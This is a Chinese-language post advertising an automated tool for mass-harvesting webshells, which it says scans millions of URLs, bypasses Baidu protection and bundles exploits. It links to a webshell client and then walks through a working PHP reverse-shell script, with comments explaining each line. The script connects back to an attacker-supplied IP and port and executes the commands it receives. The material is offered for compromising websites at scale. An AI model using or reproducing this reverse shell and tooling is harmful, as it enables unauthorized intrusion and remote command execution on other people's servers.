批量拿webshell工具下載【全自動】,新版全新url爬蟲采集,過百度防護,多款優質exp,cms組合,一天可輕松掃描三百萬url,輕松日出上百,自定義一句話。
全新xise菜刀,https://share.weiyun.com/NM8NH1Xt
步驟詳解:
前提:
①、PHPStudy開啟相關服務。
②、假設木馬已上傳至服務器且可以訪問(即執行代碼才能反彈shell)。
③、攻擊機器和受害服務器要處於同一網段。
1、划線為攻擊機的IP+端口。
2、攻擊機監聽自身端口4444,即可獲取執行shell。
<?php
set_time_limit(0);
$ip=$_POST['ip'];
$port=$_POST['port'];
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){echo "error";}
else{
fputs($fp,"\n+++++++++++++connect sucess+++++++++\n");
while(!feof($fp)){
fputs($fp,"shell:");
$shell=fgets($fp);
$message=`$shell`;
fputs($fp,$message);
}
fclose($fp);
}
?>
代碼注釋:
1、set_time_limit()來控制運行時間。如 set_time_limit(800) ,其中將秒數如果設為0 ,表示持續運行到程序結束。
2、$_POST['ip'] $_POST['port']表示傳遞的攻擊的IP,PORT。
3、$fp=@fsockopen($ip,$port,$errno,$errstr); fsockopen — 打開一個網絡連接或者一個Unix套接字連接,並且使用@屏蔽報錯信息,返回一個文件句柄$fp,可以被其他文件類函數調用,例如代碼中的fputs(),fgets()。
4、判斷$fp是否存在,不存在報錯echo "error",存在就使用fputs()函數寫入連接成功信息。
5、feof() 函數檢查是否已到達文件末尾(EOF)。如果出錯或者文件指針到了文件末尾(EOF)則返回 TRUE,否則返回 FALSE。使用while在不到讀取的文件末尾時一直執行。
6、fputs($fp,"shell:");向句柄輸出shell:的提示
7、$shell=fgets($fp);將攻擊機輸入命令通過文件句柄$fp傳遞入受害機器,同時使用fget()函數讀取輸入的命令,最終傳遞給$shell變量存儲。
8、$message=`$shell`;php默認將反單引號的內容作為系統命令執行。
9、fputs($fp,$message);將結果輸出至攻擊機端顯示。
10、fclose($fp);關閉文件句柄。